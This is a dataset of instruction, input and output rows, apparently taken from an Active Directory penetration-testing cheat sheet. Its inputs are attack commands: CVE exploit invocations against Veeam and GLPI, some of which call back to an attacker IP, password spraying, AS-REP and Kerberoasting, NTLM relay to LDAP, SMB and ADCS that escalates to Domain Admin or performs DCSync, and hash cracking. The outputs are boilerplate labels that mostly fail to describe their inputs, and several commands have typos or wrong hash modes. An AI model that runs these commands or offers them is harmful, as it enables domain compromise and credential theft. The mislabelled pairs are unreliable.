instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Veeam:
CVE-2023-27532 net.tcp:/<target>:<port>/
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29849 (auth bypass - Veeam Backup Enterprise Manager)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29849.py --target https://<veeam_ip>:<veeam_port>/ --callback-server <attacker_ip>:<port>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29855 (auth bypass - Veeam Recovery Orchestrator)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29855.py --start_time <start_time_epoch> --end_time <end_time_epoch> --username <user>@<domain> --target https://<veeam_ip>:<veeam_port>/
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-40711 (unserialize - Veeam backup)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://<attacker_ip>:8000/trigger --targetveeam <veeam_ip>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
GLPI:
CVE-2022-35914
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
GLPI:
/vendor/htmlawed/htmlawed/htmLawedTest.php
Note or procedural step under 'GLPI:'.
GLPI:
CVE_2023_41320
Note or procedural step under 'GLPI:'.
GLPI:
cve_2023_41320.py -u <user> -p <password> -t <ip>
Note or procedural step under 'GLPI:'.
GLPI: > Weak websites / services
nuclei
Note or procedural step under 'GLPI: > Weak websites / services'.
GLPI: > Weak websites / services
nuclei -target <ip_range>
Note or procedural step under 'GLPI: > Weak websites / services'.
GLPI: > Weak websites / services
nessus
Note or procedural step under 'GLPI: > Weak websites / services'.
Password Spray
Get password policy (you need creds,but you should get the policy first to avoid locking accounts)
Note or procedural step under 'Password Spray'.
Password Spray
default policy
Note or procedural step under 'Password Spray'.
Password Spray
nxc smb <dc_ip> -u '<user>' -p '<password>' -pass-pol
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Password Spray
Get-ADDefaultDomainPasswordPolicy
Note or procedural step under 'Password Spray'.
Password Spray
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> domain_policy
Note or procedural step under 'Password Spray'.
Password Spray
Fined Policy (Privileged)
Note or procedural step under 'Password Spray'.
Password Spray
ldapsearch-ad.py --server <dc> -d <domain> -u <user> -p <pass> --type pass-pol
Tool or command referenced under 'Password Spray'.
Password Spray
Get-ADFineGainedPasswordPolicy -filter *
Note or procedural step under 'Password Spray'.
Password Spray
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> pso # can also be runned with a low priv account but less information will be available
Note or procedural step under 'Password Spray'.
Password Spray
user == password
Note or procedural step under 'Password Spray'.
Password Spray
nxc smb <dc_ip> -u <users.txt> -p <passwords.txt> --no-bruteforce --continue-on-success
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Password Spray
sprayhound -U <users.txt> -d <domain> -dc <dc_ip> # add --lower to lowercase and --upper to uppercase. Add nothing to get only user=pass
Note or procedural step under 'Password Spray'.
Password Spray
usuals passwords (SeasonYear!, Company123, ...)
Note or procedural step under 'Password Spray'.
Password Spray
nxc smb <dc_ip> -u <users.txt> -p <password> --continue-on-success
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Password Spray
sprayhound -U <users.txt> -p <password> -d <domain> -dc <dc_ip>
Note or procedural step under 'Password Spray'.
Password Spray
kerbrute passwordspray -d <domain> <users.txt> <password>
Tool or command referenced under 'Password Spray'.
ASREPRoast
List ASREPRoastable Users (need creds)
Note or procedural step under 'ASREPRoast'.
ASREPRoast
Bloodhound: MATCH (u:User) WHERE u.dontreqpreauth = true AND u.enabled = true RETURN u
Note or procedural step under 'ASREPRoast'.
ASREPRoast
nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
ASREPRoast
ASREP roasting
Note or procedural step under 'ASREPRoast'.
ASREPRoast
GetNPUsers.py <domain>/ -usersfile <users.txt> -format hashcat -outputfile <output.txt>
Tool or command referenced under 'ASREPRoast'.
ASREPRoast
nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
ASREPRoast
Rubeus.exe asreproast /format:hashcat
Tool or command referenced under 'ASREPRoast'.
ASREPRoast > Blind Kerberoasting
Rubeus.exe keberoast /domain:<domain> /dc:<dcip> /nopreauth: <asrep_user> /spns:<users.txt>
Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'.
ASREPRoast > Blind Kerberoasting
GetUserSPNs.py -no-preauth "<asrep_user>" -usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<domain>"/
Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'.
ASREPRoast > Blind Kerberoasting
CVE-2022-33679
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
ASREPRoast > Blind Kerberoasting
CVE-2022-33679.py <domain>/<user> <target>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Listen
Respinder -l <interface> #use --lm to force downgrade
Note or procedural step under 'Listen'.
Listen
smbclient.py
SMB client usage to list or access network shares.
NTLM relay
MS-08-068 self relay
Note or procedural step under 'NTLM relay'.
NTLM relay
msf>exploit/windows/smb_smb_relay #windows 2000 / windows 2008 server
Tool or command referenced under 'NTLM relay'.
NTLM relay
smb -> LDAP(S)
Note or procedural step under 'NTLM relay'.
NTLM relay
NTLMv1
Note or procedural step under 'NTLM relay'.
NTLM relay
remove mic (no CVE needed)
Note or procedural step under 'NTLM relay'.
NTLM relay
NTLMv2
Note or procedural step under 'NTLM relay'.
NTLM relay
remove mic (CVE-2019-10140)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
NTLM relay
HTTP(S) -> LDAP(S)
Note or procedural step under 'NTLM relay'.
NTLM relay
Usually from webdev coerce
Note or procedural step under 'NTLM relay'.
NTLM relay > To LDAP(S)
Relay to LDAP if LDAP signing and LDAPS channel binding not enfoeced (default)
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --add-computer <computer_name> <computer_password> --delegate-access #RBCD
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --shadow-credentials --shadow-target '<dc_name$>' #Shadow Credentials
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --escalate-user <user> #Domain Admin
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S) > To SMB
Relay to SMB (if SMB is not signed)
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'.
NTLM relay > To LDAP(S) > To SMB
Find SMB not signed targets (default if not a Domain controler)
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'.
NTLM relay > To LDAP(S) > To SMB
nxc smb <ip_range> --gen-relay-list smb_unsigned_ips.txt
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
NTLM relay > To LDAP(S) > To SMB
ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socks #SMB Socks
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP
Relay to CA web enrollement
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP
Relay to WSUS
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL
ntlmrelayx.py -t mssql://<ip> [-smb2support] -socks
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
Zero-Logon (safe method) (CVE-202-1472)
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
Relay one dc to another
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
ntlmrelayx.py -t dcsync://<dc_to_ip> -smb2support -auth-smb <user>:<password>
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
To HTTP
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
krbrelayx.py -t 'http://<pki>/certsrv/certfnsh.asp' --adcs --template DomainController -v '<target_netbios>$' -ip <attacker_ip>
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB
same as NTLM relay, use krbrelayx.py
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)
same as NTLM relay, use krbrelayx.py
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)'.
LM (299bd128c1101fd6)
john --format=lm hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'LM (299bd128c1101fd6)'.
LM (299bd128c1101fd6)
hashcat -m 3000 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'LM (299bd128c1101fd6)'.
NT (b4b9b02e6f09a9bd760...)
john --format=nt hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'.
NT (b4b9b02e6f09a9bd760...)
hashcat -m 1000 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'.
NTLMv1 (user::85D5BC...)
john --format=netntlm hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'NTLMv1 (user::85D5BC...)'.
NTLMv1 (user::85D5BC...)
hashcat -m 1000 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'NTLMv1 (user::85D5BC...)'.
NTLMv1 (user::85D5BC...)
crack.sh
Note or procedural step under 'NTLMv1 (user::85D5BC...)'.
NTLMv2 (user::N46iSNek...)
john --format=netntlmv2 hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'.
NTLMv2 (user::N46iSNek...)
hashcat -m 5600 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'.
Kerberos 5 TGS ($krb5tgs$23$...)
john --format=krb5tgs hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'.
Kerberos 5 TGS ($krb5tgs$23$...)
hashcat -m 13100 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'.
($krb5tgs$17...)
hashcat -m 19600 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under '($krb5tgs$17...)'.
Kerberos ASREP ($krb5asrep$23...)
hashcat -m 18200 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'Kerberos ASREP ($krb5asrep$23...)'.
($DCC2$10240...)
hashcat -m 2100 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under '($DCC2$10240...)'.
($DCC2$10240...)
Timeroast hash ($sntp-ms$...)
Note or procedural step under '($DCC2$10240...)'.
($DCC2$10240...)
hashcat -m 31300 -a 3 hash.txt -w 3 ?l?l?l?l?l?l?l
Tool or command referenced under '($DCC2$10240...)'.
pxe hash ($sccm$aes128$...)
hashcat -m 19850 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'pxe hash ($sccm$aes128$...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Find all users
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
nxc smb <dc_ip> -u '<user>' -p '<password>' --users
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Classic Enumeration (users, shares, ACL, delegation, ...)
Enumerate SMB share
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
nxc smb <ip_range> -u '<user>' -p '<password>' -M spider_plus
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Classic Enumeration (users, shares, ACL, delegation, ...)
xc smb <ip_range> -u '<user>' -p '<password>' --shares [--get-file \\<filename> <filename>]
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
manspider <ip_range> -c passw -e <file extensions> -d <domain> -u <user> -p <password>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Bloodhound Legacy
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
sharphound.exe -c all -d <domain>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.